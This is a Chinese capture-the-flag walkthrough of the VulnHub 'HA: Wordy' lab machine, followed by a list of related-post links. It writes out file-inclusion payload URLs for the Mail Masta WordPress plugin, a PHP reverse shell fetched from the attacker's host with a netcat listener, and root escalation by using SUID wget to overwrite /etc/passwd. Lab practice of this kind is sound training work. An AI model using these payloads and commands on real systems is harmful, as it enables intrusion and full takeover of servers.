HA: Wordy靶场

HA: Wordy

来自 < HA: Wordy ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.130

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.130

4,这个网站是一个默认页面

dirsearch -u http://192.168.23.130/ -x 403,404

网站应该是一个wordpress建站系统

查看网站安装的插件

检索这个插件存在的漏洞

searchsploit mail masta

然后查看漏洞利用方法

searchsploit -m 40290.txt

cat 40290.txt

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

漏洞利用成功,尝试污染日志文件,然后通过文件包含漏洞getshell。

5,第二种方法,测试是否存在远程文件包含漏洞

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=https://www.baidu.com

存在,那么就可以通过远程文件包含漏洞进行写马操作,使用kali自带的木马

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php

vim shell.php

注意修改反弹shell的IP和端口

python -m http.server

http://192.168.23.130/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.23.128:8000/shell.php

与此同时需要打开对4444端口的监听

nc -lvvp 4444

成功getshell

6,使用python脚本启动一个交互式shell,没有python这个命令

查看一下怎么提权

sudo -l

find / -type f -perm -u=s -user root 2>/dev/null

使用wget -O 提权,利用wget -O命令覆盖/etc/passwd文件

在kali上创建文本文件,取名passwd,并将靶机/etc/passwd文件的内容复制进去。因为之后要覆盖靶机的/etc/passwd,所以名字要一模一样

vim passwd

openssl passwd -1 123456

cat passwd

然后再开启一个

python -m http.server

cd /tmp

wget http://192.168.23.128:8000/passwd

cp passwd /etc/passwd

python3 -c 'import pty;pty.spawn("/bin/bash")'

su

相关推荐
2501_916007477 分钟前
iOS 性能测试工具全流程:主流工具实战对比与适用场景
websocket·tcp/ip·http·网络安全·https·udp
卿着飞翔8 分钟前
系统架构设计师论文分享-论系统安全设计
安全·系统架构·系统安全
teeeeeeemo37 分钟前
http和https的区别
开发语言·网络·笔记·网络协议·http·https
wuxuanok44 分钟前
Web后端开发-Mybatis
java·开发语言·笔记·学习·mybatis
Bruce_Liuxiaowei1 小时前
Netstat高级分析工具:Windows与Linux双系统兼容的精准筛查利器
linux·运维·网络·windows·安全
卷到起飞的数分1 小时前
Java零基础笔记07(Java编程核心:面向对象编程 {类,static关键字})
java·开发语言·笔记
iFulling2 小时前
【计算机网络】第三章:数据链路层(下)
网络·笔记·计算机网络
巴伦是只猫2 小时前
【机器学习笔记 Ⅱ】4 神经网络中的推理
笔记·神经网络·机器学习
java攻城狮k2 小时前
【跟着PMP学习项目管理】项目管理 之 成本管理知识点
经验分享·笔记·学习·产品经理
开开心心就好3 小时前
高效报价软件,简化商铺定价流程
服务器·数据库·安全·面试·职场和发展·电脑·symfony